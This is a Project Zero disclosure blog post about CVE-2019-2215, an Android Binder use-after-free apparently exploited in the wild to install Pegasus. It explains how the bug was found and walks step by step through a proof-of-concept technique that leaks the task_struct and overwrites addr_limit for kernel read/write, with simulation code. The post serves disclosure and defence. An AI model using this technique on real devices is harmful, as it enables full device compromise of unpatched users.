Posted by Maddie Stone, Project Zero
Introduction
On October 3, 2019, we disclosed issue 1942 (CVE-2019-2215), which is a use-after-free in Binder in the Android kernel. The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If chained with a browser renderer exploit, this bug could fully compromise a device through a malicious website.
We reported this bug under a 7-day disclosure deadline rather than the normal 90-day disclosure deadline. We made this decision based on credible evidence that an exploit for this vulnerability exists in the wild and that it is highly likely that the exploit is being actively used against users.
In May 2019, Project Zero published a blog post and spreadsheet for tracking “in-the-wild” 0-day exploits. In July 2019, I joined Project Zero to focus on the use of 0-day exploits in the wild. We expect our approach to this work will change and mature as we gain more experience with studying 0-days, but the mission stays the same: to “make zero-day hard”. 
So far there are a few key approaches that we have started with: 
- Hunt for bugs based on rumors/leads that a 0-day is currently in use. We will use our bug hunting expertise to find and patch the bug, rendering the exploit benign.
- Perform variant analysis on 0-days used in the wild. When looking for bugs, you often find more than one of a similar type at the same time. However, an exploit usually uses one instance of a possible pattern or variant. If we can find and resolve all of the similar variant bugs, then the effort involved in creating a new exploit will be higher.
- Complete detailed analysis of the 0-days from the point of view of bug hunters and exploit developers and share it back with the community. Transparency and collaboration are key. We want to share detailed root cause analysis to inform developers and defenders on how to prevent these types of bugs in the future and improve detection. We hope that by publishing details about the exploit and its methodology, this can inform threat intelligence and incident responders. Overall, we want to make information that’s often kept in silos accessible to all.
This is just the starting point of how we’re thinking about tactical work around 0-day exploits used in the wild, but we won’t make much progress if we try to do this alone. Whether you’re a vendor, defender, researcher, journalist, threat analyst, policy specialist, victims’ advocate, or someone else, we all have a role we can play to make it hard to exploit 0-days in the wild. Please feel free to reach out to me to explore how we may be able to work together.
The rest of this post is to drive this conversation forward by sharing one instance of such work: CVE-2019-2215. This blog post will explain the bug and the methodology for finding it, how the proof-of-concept exploit we released works, and the evidence and commentary on the use of this bug for in-the-wild exploitation.
Hunting the Bug
In late summer 2019, Google’s Threat Analysis Group (TAG), Android Security, and Project Zero team received information suggesting that NSO had a 0-day exploit for Android that was part of an attack chain that installed Pegasus spyware on target devices. We received details about the marketed “capability”. These details included facts about the bug and exploit methodology, including:
- It is a kernel privilege escalation using a use-after-free vulnerability, reachable from inside the Chrome sandbox.
- It works on Pixel 1 and 2, but not Pixel 3 and 3a.
- It was patched in the Linux kernel >= 4.14 without a CVE.
- CONFIG_DEBUG_LIST breaks the primitive.
- CONFIG_ARM64_UAO hinders exploitation.
- The vulnerability is exploitable in Chrome's renderer processes under Android's isolated_app SELinux domain.
- The exploit requires little or no per-device customization.
- A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of issue 1942.
Each of these facts gave us important information to scope down the potential bug that we were looking for.
- “It is a kernel privilege escalation using a use-after-free vulnerability, reachable from inside the Chrome sandbox.”
We know that it’s a use-after-free in the kernel.
- "It works on Pixel 1 and 2, but not Pixel 3 and 3a."
We can diff the Pixel 2 and Pixel 3 kernels looking for changes.
- "It was patched in the Linux kernel >= 4.14 without a CVE."
The Pixel 3 is based on the Linux kernel 4.9 and doesn’t include the vulnerability, but the fix is not in the 4.9 Linux kernel, only 4.14.
- "CONFIG_DEBUG_LIST breaks the primitive."
This was an extremely helpful tip. In the kernel, there are only two actions (three functions) whose behavior changes based on the CONFIG_DEBUG_LIST flag: adding (__list_add) and deleting (__list_del_entry and list_del) from a doubly linked list. Therefore, we could infer that the freed object is a linked list and has an add or delete performed on it after the free occurs.
- "CONFIG_ARM64_UAO hinders exploitation."
This likely means that the exploit uses the memory corruption to overwrite the address limit that is stored near the start of the task_struct. (On Linux <= 4.9 it would normally be stored at the bottom of the stack, but Android backported to older kernels the change that moved it into task_struct to protect against stack overflows.)
- "The exploit requires little or no per-device customization."
We can assume the bug and its exploitation methodology are in the common kernel rather than in code that is often customized, like the framework.
- "A list of affected and unaffected devices and their versions."
Whenever there was a candidate bug that seemed to fit all the requirements above, I then vetted it against the list of affected and unaffected devices.
Based on these details, I began combing through changelogs and patches looking for the potential bug. I actually found CVE-2019-2215 on my second attempt. I had originally thought the potential bug was a different issue, but then ruled it out based on the information above.
A few weeks after my first attempt at tracking down this bug, others recommended that I should look at Binder. Looking back, the detail that states “The vulnerability is exploitable in Chrome's renderer processes under Android's isolated_app SELinux domain.” should have caused me to look at the Binder driver first, but it didn’t.
When I diffed the Pixel 2 and Pixel 3 drivers/android/binder.c files and their changelogs, there were only a few significant changes. Commit 550c01d0e051461437d6e9d72f573759e7bc5047 stood out in the log because:
- It discusses fixing a “use-after-free” in the commit message,
- It is a patch from upstream, and
- The upstream patch was only applied to 4.14.
I then began to evaluate this bug against the other requirements of the bug in the leads and found that it matched them perfectly. I also looked through every other change to Binder (~25) between the Pixel 2 and Pixel 3, and no other changes matched every detail.
We wrote a proof-of-concept of our own that demonstrates how this bug can be exploited. 
The Original Discovery of the Bug
This bug was originally found and reported in November 2017 and patched in February 2018. Syzbot, a syzkaller system that continuously fuzzes the Linux kernel, originally reported the use-after-free bug to Linux kernel mailing lists and the syzkaller-bugs mailing list in November 2017. From this report, the bug was patched in the Linux 4.14, Android 3.18, Android 4.4, and Android 4.9 kernels in February 2018. However, this fix was never included in an Android monthly security bulletin and thus the bug was never patched in many already released devices, such as Pixel and Pixel 2.
Android provided the following statement on the original discovery of the bug.
"Android was informed of the security implications of this bug by Project Zero on September 26, 2019. Android partners were notified of the bug and provided updates to address it within 24 hours. Android also assigned CVE-2019-2215 to explicitly indicate that it represents a security vulnerability as the original report from syzkaller and the corresponding Linux 4.14 patch did not highlight any security implications. 
Pixel 3 and 3a were already protected against these issues. Updates for affected Pixel devices were available to users as early as October 7th, 2019."
Technical Details of the Bug
The bug is a use-after-free (UAF) in the Binder driver. The binder_thread struct, defined in drivers/android/binder.c, has the member wait of the wait_queue_head_t struct type. wait is still referenced by a pointer in epoll, even after the binder_thread struct containing it is freed.
The BINDER_THREAD_EXIT ioctl calls the binder_thread_release function which frees the binder_thread struct. However, if epoll is called on this thread, binder_poll tells epoll to use wait, the wait queue that is embedded in the binder_thread struct. Therefore, when the binder_thread struct is freed, epoll is pointing to the now freed wait queue. Normally, the wait queue used for polling on a file is guaranteed to be alive until the file’s release handler is called. Rare cases require the use of POLLFREE. In contrast, the Binder driver only worked if you constantly removed and re-added the epoll watch. This is the underlying bug and the use-after-free is a symptom of that.
When we look at the stack trace from KASAN in the original report, we can see the use-after-free is in remove_wait_queue in kernel/sched/wait.c. The source code for the remove_wait_queue is below. In the remove_wait_queue function, q is the pointer to the freed wait_queue_head_t in the binder_thread struct and wait is an entry in the wait queue whose head has been freed. The use-after-free that triggered the KASAN crash is the call to spin_lock_irqsave with argument &q->lock when q is pointing to freed memory.
However, the __remove_wait_queue call is more interesting for exploitation. As shown below, __remove_wait_queue simply calls list_del on the task_list in the wait queue, giving us an unlinking primitive.
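The unlinking primitive can be modelled in user space. The sketch below is a simplified stand-in rather than the kernel source: the struct and function names mirror the kernel's, but locking is omitted, the wait queue structs are reduced to their list members, and the poison values are placeholders chosen for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* User-space model of the kernel's doubly linked list node. */
struct list_head {
    struct list_head *next, *prev;
};

/* Reduced wait queue head and entry: the real structs also carry a
 * spinlock, flags, and a wake-up callback. */
struct wait_queue_head {
    struct list_head task_list;
};

struct wait_queue_entry {
    struct list_head task_list;
};

/* Placeholder poison pointers (illustrative values, not the kernel's). */
#define MODEL_POISON1 ((struct list_head *)0x100)
#define MODEL_POISON2 ((struct list_head *)0x200)

/* Insert entry directly after head. */
void list_add(struct list_head *entry, struct list_head *head)
{
    entry->next = head->next;
    entry->prev = head;
    head->next->prev = entry;
    head->next = entry;
}

/* Unlink entry: two pointer writes that go through the neighbours'
 * addresses stored in the entry. No validation is performed. */
void list_del(struct list_head *entry)
{
    assert(entry != NULL);
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
    entry->next = MODEL_POISON1;
    entry->prev = MODEL_POISON2;
}

/* Model of remove_wait_queue: the kernel takes q->lock around the
 * unlink, which this sketch skips. */
void model_remove_wait_queue(struct wait_queue_head *q,
                             struct wait_queue_entry *wait)
{
    (void)q;
    list_del(&wait->task_list);
}
```

When the entry is the only member of the list, both writes land in the list head, which is why a stale head in freed memory is enough to corrupt whatever object now occupies that memory.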
The bug can be triggered with the following code, which was also in the original report from syzkaller.
I verified that the Pixel 2, running Android 10 with SPL September 2019, still included this bug. The KASAN output is included in the issue tracker.
Exploiting the Use-After-Free
After confirming the bug and reporting to Android, I began working with fellow team member, Jann Horn, to write a proof-of-concept (PoC) exploit. The PoC we published on the issue tracker in comment #7 used the UAF described above to gain arbitrary kernel read and write from an unprivileged application context. In this section, I will explain how the PoC exploit that we wrote works. This section describes how we decided to exploit this bug and not necessarily how the in-the-wild exploit works.
This exploit triggers the UAF twice in order to overwrite the address limit to obtain arbitrary kernel read and write privileges. The first use of the UAF leaks the address of the task_struct, which contains the process’s address limit (addr_limit). The second use of the UAF overwrites the value of addr_limit. The addr_limit value defines which address range may be accessed when dereferencing userspace pointers. Usercopy operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process.
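To make the role of addr_limit concrete, here is a minimal user-space model of the range check. It is a sketch under stated assumptions: the function name and the MODEL_USER_DS value are illustrative (the real limit depends on the kernel's virtual address configuration), and the real check is architecture-specific.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Illustrative limits only; the real USER_DS value depends on the
 * kernel's virtual address configuration. */
#define MODEL_USER_DS   UINT64_C(0x0000007FFFFFFFFF)
#define MODEL_KERNEL_DS UINT64_C(0xFFFFFFFFFFFFFFFF)

static_assert(MODEL_USER_DS < MODEL_KERNEL_DS, "user limit must be lower");

/* Simplified range check: every byte of [addr, addr + size) must lie at
 * or below addr_limit, and the range must not wrap around. */
bool model_access_ok(uint64_t addr, uint64_t size, uint64_t addr_limit)
{
    uint64_t last;

    if (size == 0)
        return addr <= addr_limit;
    last = addr + (size - 1);
    if (last < addr)            /* wrapped past the top of the address space */
        return false;
    return last <= addr_limit;
}
```

With the illustrative user limit, an 8-byte access at a kernel-range address such as 0xFFFFFFC000080000 is rejected; with the limit raised to 0xFFFFFFFFFFFFFFFE, the same access passes the model's check.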
To trigger the UAF, we use vectored (scatter/gather) I/O in a somewhat similar way to what DiShen presented in his talk from Code Blue 2017, “The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel” [video].
Triggering the UAF
To exploit the UAF bug, we reallocate the freed binder_thread memory as an I/O vector and then use the unlinking primitive to gain scoped kernel read to leak the task_struct address. We trigger the UAF again for scoped kernel write to then overwrite the addr_limit. This section describes how we use the UAF for the initial read and write.
About Vectored I/O
Vectored I/O is also known as scatter/gather I/O. Vectored reads move data from a data source (here a file) into a set of disparate buffers (scatter), moving onto the next after each buffer is filled. A vectored write moves data from a set of buffers into a data sink (here a file) (gather). readv and writev are syscalls for performing vectored I/O. Their definitions from fs/read_write.c are below. 
The vec arguments are arrays of iovec structs where each iovec struct describes a buffer. The iovec struct definition from include/uapi/linux/uio.h is below.
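For readers unfamiliar with these syscalls, the following benign user-space sketch shows gather and scatter through a pipe. The function name and buffer contents are made up for illustration; only writev, readv, pipe, and struct iovec are real interfaces.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Gather two source buffers into a pipe with writev(), then scatter the
 * 12 bytes back out into two 6-byte buffers with readv().
 * Returns 0 on success, -1 on failure. */
int vectored_io_demo(char dst_a[6], char dst_b[6])
{
    char src1[4] = { 'a', 'b', 'c', 'd' };
    char src2[8] = { 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l' };
    struct iovec out[2] = {
        { .iov_base = src1, .iov_len = sizeof(src1) },
        { .iov_base = src2, .iov_len = sizeof(src2) },
    };
    struct iovec in[2] = {
        { .iov_base = dst_a, .iov_len = 6 },
        { .iov_base = dst_b, .iov_len = 6 },
    };
    int fds[2];
    int rc = -1;

    assert(dst_a != NULL && dst_b != NULL);
    if (pipe(fds) != 0)
        return -1;
    /* The data sink sees one contiguous 12-byte stream. */
    if (writev(fds[1], out, 2) == 12 && readv(fds[0], in, 2) == 12)
        rc = 0;
    close(fds[0]);
    close(fds[1]);
    return rc;
}
```

Note that the buffer boundaries on the read side do not have to match those on the write side: the first destination buffer is filled completely before the second one is touched.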
We use writev to leak the address of the task_struct the first time we trigger the UAF. In addition to readv and writev, the recvmsg syscall for receiving a message from a socket also uses vectored I/O. In the msghdr, the second argument to recvmsg, there is a member named msg_iov that points to an array of iovec structs. We use recvmsg the second time we trigger the UAF to overwrite the addr_limit. 
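The recvmsg side can be illustrated the same way. This is a harmless sketch using a socketpair; the function name and message contents are hypothetical, while msghdr, msg_iov, and msg_iovlen are the real fields.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send 10 bytes over a Unix domain socket pair and receive them with
 * recvmsg() into two 5-byte buffers described by msg_iov.
 * Returns 0 on success, -1 on failure. */
int recvmsg_scatter_demo(char head[5], char tail[5])
{
    struct iovec iov[2] = {
        { .iov_base = head, .iov_len = 5 },
        { .iov_base = tail, .iov_len = 5 },
    };
    struct msghdr msg;
    int sv[2];
    int rc = -1;

    assert(head != NULL && tail != NULL);
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;

    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = iov;       /* array of buffers to scatter into */
    msg.msg_iovlen = 2;

    if (write(sv[1], "helloworld", 10) == 10 &&
        recvmsg(sv[0], &msg, MSG_WAITALL) == 10)
        rc = 0;
    close(sv[0]);
    close(sv[1]);
    return rc;
}
```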
Using vectored I/O for UAF write and read
We use the vectored I/O to gain UAF read (leaking the task_struct address) and UAF write (overwriting the addr_limit in the task_struct). Vectored I/O operations (like readv, writev, and recvmsg) import the user-space I/O vector array into kernel space and verify that all of the vector elements are in userspace in the call to rw_copy_check_uvector. If rw_copy_check_uvector returns successfully, the iovec array is now in kernel space and there will not be another verification on the pointer values in the iov_base fields. This means that while the I/O is blocking, we can overwrite the buffer pointers in the iovec array using our UAF read/write and then read from or write to a place in kernel memory. 
The iovec struct is of size 16 bytes and the binder_thread struct is 408 bytes. Therefore, we will create an array of 25 iovec structs in order to make the iovec array a similar size to the freed struct. The kernel allocates memory based on the size of the allocations so if we can control a struct of almost the same size as the freed memory, then there is a good chance that our controlled struct will be allocated into the same place. The iovec array is 8 bytes smaller than the binder_thread in order to not overwrite the task_struct pointer value at the end of the binder_thread struct, but that is still close enough to be allocated into the same slab, and thus the same position in kernel memory as the freed binder_thread struct. 
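The size arithmetic can be checked with a few lines of C. This sketch assumes a 64-bit (LP64) target, where struct iovec is 16 bytes, and models the allocator as plain power-of-two size classes, which is a simplification of the kernel's kmalloc caches. The helper names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/uio.h>

#define BINDER_THREAD_SIZE 408u  /* size quoted in the text */
#define IOVEC_COUNT        25u   /* number of iovec structs used */

static_assert(sizeof(struct iovec) == 16, "sketch assumes an LP64 target");

/* Round a request up to the next power-of-two size class. Real kernels
 * may have extra classes (for example 96 and 192 bytes), which do not
 * affect allocations of around 400 bytes. */
size_t model_size_class(size_t n)
{
    size_t cls = 8;

    while (cls < n)
        cls *= 2;
    return cls;
}

/* Total size of the iovec array used to reclaim the freed memory. */
size_t iovec_array_size(void)
{
    return IOVEC_COUNT * sizeof(struct iovec);
}
```

Under these assumptions the array is 400 bytes, 8 bytes short of the 408-byte struct, and both sizes fall into the same 512-byte class.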
When the iovec array is allocated into the same memory as our freed binder_thread struct, the struct members will line up as below.
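The overlap can also be worked out numerically. The helper below is a hypothetical illustration that maps a byte offset in the reused allocation to the iovec element and field occupying it, assuming a 64-bit target. The offsets 0xA8, 0xB0, and 0x190 come from this post; 0xA0 for the lock is inferred from iovec[10].iov_base having to look like a spinlock.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/uio.h>

static_assert(sizeof(struct iovec) == 16, "sketch assumes an LP64 target");

enum iov_field { IOV_BASE, IOV_LEN };

struct iov_slot {
    size_t index;          /* which iovec element covers the offset */
    enum iov_field field;  /* which field of that element */
};

/* Map a byte offset inside the allocation to the overlapping iovec
 * element and field (iov_base at +0, iov_len at +8 on LP64). */
struct iov_slot slot_at(size_t offset)
{
    struct iov_slot s;

    s.index = offset / sizeof(struct iovec);
    s.field = (offset % sizeof(struct iovec)) < offsetof(struct iovec, iov_len)
                  ? IOV_BASE
                  : IOV_LEN;
    return s;
}
```

With this mapping, offset 0xA0 is iovec[10].iov_base, 0xA8 is iovec[10].iov_len, and 0xB0 is iovec[11].iov_base. Offset 0x190 maps to index 25, one past the end of a 25-element array, so the task_struct pointer is left intact.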
Once the vectored I/O has copied our iovec structs into kernel memory, we then want the I/O operation to block so that ep_remove_wait_queue can run from a separate thread. When ep_remove_wait_queue runs, it will perform a list_del operation on the values at offsets 0xA8 and 0xB0 in our diagram since ep_remove_wait_queue still believes these memory values to be a part of the wait_queue_head_t struct. 
ep_remove_wait_queue calls remove_wait_queue, which calls __remove_wait_queue, which calls list_del.
The UAF exploitation technique described in this blog post is not successful when CONFIG_DEBUG_LIST is enabled because list_del is implemented differently when it’s enabled. The implementation when CONFIG_DEBUG_LIST is NOT enabled is shown above.
The debug implementation, shown below, is found in lib/list_debug.c. In the debug version, list_del calls __list_del_entry which includes checks to ensure that prev->next == entry && next->prev == entry. If any of these checks fail, BUG_ON will be called and the process will die (and on Android devices, which usually set kernel.panic_on_oops=1, the entire device will reboot). This check is what prevents this exploitation method from working when CONFIG_DEBUG_LIST is enabled.
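The effect of those checks can be sketched in user space. This model is an approximation, not the kernel's code: it returns false where the kernel would hit BUG_ON, and it omits the kernel's additional poison-value checks. The function name is hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct list_head {
    struct list_head *next, *prev;
};

/* Model of the CONFIG_DEBUG_LIST consistency checks. The entry is only
 * unlinked if both neighbours still point back at it; otherwise nothing
 * is written and false is returned. */
bool checked_list_del(struct list_head *entry)
{
    struct list_head *prev;
    struct list_head *next;

    assert(entry != NULL);
    prev = entry->prev;
    next = entry->next;
    if (prev->next != entry || next->prev != entry)
        return false;
    next->prev = prev;
    prev->next = next;
    return true;
}
```

In the exploit scenario, the list head has been overwritten with iovec data, so its next and prev no longer point back at the wait queue entry and the check fails before any write happens.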
The entry being passed to list_del is an entry in the wait queue list. The freed wait_queue_head_t struct contains the list head of which this entry is the only member. Prior to the list_del operation, the list looks like the diagram below.
After the list_del operation, the list looks like the diagram below. The list head's prev and next pointers have been set to point to the list head itself. This means that iovec[11].iov_base has been overwritten with a kernel address and we can now perform scoped read and write operations from the kernel space beginning at the list head.
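The overlap between the unlink and the iovec array can be simulated entirely in user space. In this sketch a heap buffer stands in for the freed binder_thread memory and a local list node stands in for epoll's wait queue entry. The function name and the 0x1000 placeholder lengths are made up, and a 64-bit target is assumed.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/uio.h>

#define ALLOC_SIZE    408   /* binder_thread size, from the text */
#define IOVEC_COUNT   25
#define WAIT_LIST_OFF 0xA8  /* offset of the wait queue list head */

static_assert(sizeof(struct iovec) == 16, "sketch assumes an LP64 target");

struct list_head {
    struct list_head *next, *prev;
};

/* Non-debug unlink: two unchecked pointer writes. */
void list_del(struct list_head *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
}

/* Simulate the stale unlink. On success (return 0), *len10 and *base11
 * hold iovec[10].iov_len and iovec[11].iov_base as they read after the
 * unlink, and *head_addr holds the address of the overlapped list head. */
int simulate_unlink(uintptr_t *len10, uintptr_t *base11, uintptr_t *head_addr)
{
    struct iovec iov[IOVEC_COUNT];
    struct list_head stale_entry;
    struct list_head *head;
    unsigned char *mem = calloc(1, ALLOC_SIZE);

    if (mem == NULL)
        return -1;

    /* The "reallocation": an iovec array now occupies the old struct. */
    memset(iov, 0, sizeof(iov));
    iov[10].iov_len = 0x1000;
    iov[11].iov_len = 0x1000;
    memcpy(mem, iov, sizeof(iov));

    /* The stale entry still points at where the list head used to be. */
    head = (struct list_head *)(mem + WAIT_LIST_OFF);
    stale_entry.next = head;
    stale_entry.prev = head;
    list_del(&stale_entry);

    /* Read the array back the way the vectored I/O code would see it. */
    memcpy(iov, mem, sizeof(iov));
    *len10 = (uintptr_t)iov[10].iov_len;
    *base11 = (uintptr_t)iov[11].iov_base;
    *head_addr = (uintptr_t)head;
    free(mem);
    return 0;
}
```

Both overlapped fields end up holding the address of the list head: iovec[10].iov_len is clobbered, and iovec[11].iov_base now points back into the same allocation.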
Leaking the task_struct pointer
We follow the process outlined above to use the use-after-free to leak the task structure pointer. In the Linux kernel, and thus in the Android kernel, the task_struct includes most of the important information about a process. In this case, we want to get the pointer to the task_struct because it includes the process’s address limit. 
The code to leak the task_struct pointer is in the function leak_task_struct in the PoC. The function starts by adding the binder file descriptor (fd) to the epoll’s interest list. We then create an array of 25 iovec structs. Next, we set the values of each of the iovec entries. For the first 10 entries, we set both the iov_base and iov_len to 0 so that the kernel skips them when processing the vector. iovec[10].iov_base is set to a value that will look like an unlocked spinlock. iovec[10].iov_len is set to the same size as the pipe so that writev will block after moving all the contents from iovec[10].iov_base into the pipe. Once it unblocks, it will begin on iovec[11].
We set iovec[10].iov_base to dummy_page_4g_aligned because we need the lower half of the address value to be 0 for it to pass as a spinlock. In remove_wait_queue, we need spin_lock_irqsave to run successfully so that __remove_wait_queue is called.
For this to be successful, the call to remove_wait_queue from within the EPOLL_CTL_DEL execution must occur after the iovec array has been copied to kernel memory by rw_copy_check_uvector (called by writev) and iovec[10] has been processed (since its length will be clobbered by the UAF write), but before writev begins reading from the address at iovec[11].iov_base. 
Therefore, we need the writev call to block prior to trying to write the iovec[11] contents to the pipe. To do this, we fill the whole pipe with contents that we don’t care about. Because we completely fill the pipe, writev will block until something begins to read from the pipe. Therefore, we set iovec[10].iov_base to be the address of the buffer with these filler contents and we set its length to the same size as the pipe size. writev will put all of the dummy contents into the pipe and block, giving us time to change the address of iovec[11].iov_base with the unlinking primitive in remove_wait_queue. After remove_wait_queue finishes, we can read the dummy contents from the pipe, unblocking the write. The now-unblocked writev will begin reading from the address in iovec[11].iov_base, which has now been changed to the list head address, binder_thread + 0xa8, in the kernel.
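The blocking behaviour of a full pipe is easy to observe in isolation. The sketch below uses O_NONBLOCK so that "would block" shows up as EAGAIN instead of hanging the demo; the function name is hypothetical, and the measured capacity depends on the system.

```c
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Fill a pipe until a write would block, then drain it and confirm that
 * writing works again. On success returns 0 and stores the number of
 * bytes the pipe accepted in *capacity; returns -1 on failure. */
int fill_pipe_until_blocked(size_t *capacity)
{
    char chunk[4096] = { 0 };
    size_t total = 0;
    size_t drained = 0;
    int fds[2];
    int result = -1;

    assert(capacity != NULL);
    if (pipe(fds) != 0)
        return -1;
    if (fcntl(fds[1], F_SETFL, O_NONBLOCK) != 0)
        goto out;

    /* EAGAIN marks the point where a blocking writer would stall. */
    for (;;) {
        ssize_t n = write(fds[1], chunk, sizeof(chunk));
        if (n > 0) {
            total += (size_t)n;
            continue;
        }
        if (n == -1 && errno == EAGAIN)
            break;
        goto out;
    }

    /* Reading from the other end is what unblocks the writer. */
    while (drained < total) {
        ssize_t n = read(fds[0], chunk, sizeof(chunk));
        if (n <= 0)
            goto out;
        drained += (size_t)n;
    }
    if (write(fds[1], "x", 1) == 1) {
        *capacity = total;
        result = 0;
    }
out:
    close(fds[0]);
    close(fds[1]);
    return result;
}
```

A blocking writev stalls at exactly the point where this demo sees EAGAIN, which is the window in which another thread can act before the next iovec element is processed.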
Once the writev finishes, we read from the other end of the pipe. The value at offset 0xE8 is the task_struct pointer. (The wait queue list head is at 0xa8 in the binder_thread struct and the task_struct pointer is at 0x190.)
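The 0xE8 figure follows directly from the two struct offsets. A small sketch of the arithmetic and of pulling a 64-bit value out of a leaked buffer, with hypothetical helper names:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define WAIT_LIST_OFF 0xA8   /* list head offset in binder_thread */
#define TASK_PTR_OFF  0x190  /* task_struct pointer offset in binder_thread */

static_assert(TASK_PTR_OFF > WAIT_LIST_OFF, "pointer lies after the list head");

/* The leak starts at the list head, so the pointer's position within
 * the leaked data is the difference between the two offsets. */
size_t task_ptr_offset_in_leak(void)
{
    return TASK_PTR_OFF - WAIT_LIST_OFF;
}

/* Copy the 64-bit value at that position out of a leaked buffer.
 * Returns 0 if the buffer is too short to contain it. */
uint64_t extract_task_ptr(const unsigned char *leak, size_t leak_len)
{
    uint64_t value = 0;
    size_t off = task_ptr_offset_in_leak();

    if (leak == NULL || leak_len < off + sizeof(value))
        return 0;
    memcpy(&value, leak + off, sizeof(value));
    return value;
}
```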
Overwriting the Address Limit
Now that we have saved off the task_struct pointer, we trigger the UAF again in order to overwrite the address limit (at task_struct + 0x08), this time using recvmsg instead of writev. The process through the list_del is the same: the iov_base ends up pointing to the list_head of the wait_queue. At this point, though, instead of reading from that address, we begin to write the values below. 
To understand how this overwrites the addr_limit, we need to remember how scatter I/O works: we will read from a unix domain socket into disparate buffers, filling up one before moving to the next. After the list_del, the scatter I/O is about to begin on the buffer at iovec[11].iov_base. The value at iovec[11].iov_base now points to the list head of the wait queue after the list_del operation. The first 5 values we are going to overwrite are our iovec structs. We originally set iovec[11].iov_len to 0x28 which means we write 0x28 bytes before moving to the buffer stored in iovec[12].iov_base. We want to overwrite iovec[12].iov_base to be the address of the addr_limit so that we can overwrite the address limit without having to overwrite everything between the list head and the address limit. This is why we set the length of the iovec[11] buffer to 0x28 bytes: 0x8 bytes each for iovec[10].iov_len, iovec[11].iov_base, iovec[11].iov_len, iovec[12].iov_base, and iovec[12].iov_len. Then we move to write through the newly-overwritten address in iovec[12].iov_base. This writes 0xFFFFFFFFFFFFFFFE (one less than KERNEL_DS to bypass the segment_eq(get_fs(), KERNEL_DS) branch in iov_iter_init()) to the addr_limit, now making all memory (including kernel memory) accessible as part of the user-space memory range in our process and thus granting arbitrary kernel read and write.
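The self-overwriting scatter can be simulated harmlessly in user space. In this sketch a heap buffer stands in for the reused allocation and a local variable stands in for addr_limit. The function names, the starting limit value, and the first three payload words are illustrative assumptions. The model re-reads each iovec element from memory just before using it, as a stand-in for a scatter operation that walks an array it has itself just modified.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/uio.h>

#define ALLOC_SIZE    408
#define IOVEC_COUNT   25
#define WAIT_LIST_OFF 0xA8

static_assert(sizeof(struct iovec) == 16, "sketch assumes an LP64 target");

/* Copy src into the buffers described by the iovec array stored in
 * iov_mem, loading each element from memory only when it is reached. */
void model_scatter(unsigned char *iov_mem, size_t first, size_t count,
                   const unsigned char *src, size_t src_len)
{
    for (size_t i = first; i < count && src_len > 0; i++) {
        struct iovec cur;
        size_t n;

        memcpy(&cur, iov_mem + i * sizeof(cur), sizeof(cur));
        n = cur.iov_len < src_len ? cur.iov_len : src_len;
        if (n == 0)
            continue;
        memcpy(cur.iov_base, src, n);
        src += n;
        src_len -= n;
    }
}

/* Returns the final value of the stand-in address limit (0 on failure). */
uint64_t simulate_addr_limit_overwrite(void)
{
    uint64_t fake_addr_limit = UINT64_C(0x0000007FFFFFFFFF);
    struct iovec iov[IOVEC_COUNT];
    uint64_t payload[6];
    unsigned char *mem = calloc(1, ALLOC_SIZE);

    if (mem == NULL)
        return 0;

    /* State after the unlink: iovec[11].iov_base points at the list head. */
    memset(iov, 0, sizeof(iov));
    iov[11].iov_base = mem + WAIT_LIST_OFF;
    iov[11].iov_len = 0x28;
    iov[12].iov_len = 8;
    memcpy(mem, iov, sizeof(iov));

    payload[0] = 1;     /* lands on iovec[10].iov_len */
    payload[1] = 0;     /* lands on iovec[11].iov_base (already consumed) */
    payload[2] = 0x28;  /* lands on iovec[11].iov_len (already consumed) */
    payload[3] = (uint64_t)(uintptr_t)&fake_addr_limit; /* iovec[12].iov_base */
    payload[4] = 8;     /* iovec[12].iov_len */
    payload[5] = UINT64_C(0xFFFFFFFFFFFFFFFE); /* written via iovec[12] */

    model_scatter(mem, 11, IOVEC_COUNT,
                  (const unsigned char *)payload, sizeof(payload));
    free(mem);
    return fake_addr_limit;
}
```

The first 0x28 bytes rewrite the five fields from iovec[10].iov_len through iovec[12].iov_len, and the remaining 8 bytes are then written through the redirected iovec[12].iov_base.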
In-the-Wild Analysis
As stated in the introduction, we deemed that there was enough credible evidence that CVE-2019-2215 was being used in the wild to support a 7-day disclosure deadline. This credible evidence included the leads and details outlined above in the “Hunting the Bug” section, and how after a detailed review of kernel patches, all requirements perfectly aligned with one bug (and only one bug). The examined information included marketing materials for this exploit, and that the exploit was used to install a version of Pegasus. With this evidence, we decided that although we did not have an exploit sample, the risk to users was too great to wait 90 days for a patch and disclosure, and thus reported this to Android under a 7-day deadline.
The 7-day deadline exists because “each day an actively exploited vulnerability remains undisclosed to the public and unpatched, more devices or accounts will be compromised.” Therefore, we decided that this vulnerability required disclosure to the public as soon as possible.
Variant Analysis
I think the most important “variant” that we can take away from this bug is that bugs are often patched in the upstream Linux and/or Android kernels without being flagged as security bugs (though they have security impact), so they are not included in the Android Security Bulletin and thus do not get patched in released devices. Sorting through Linux patches is a huge undertaking, so instead, one approach to addressing this issue could be regularly syncing with the upstream stable kernels.
In addition, we also looked for other variants where the poll handler uses wait queues that are not tied to the lifetime of the file and no issues of similar significance have been discovered so far.
Conclusion
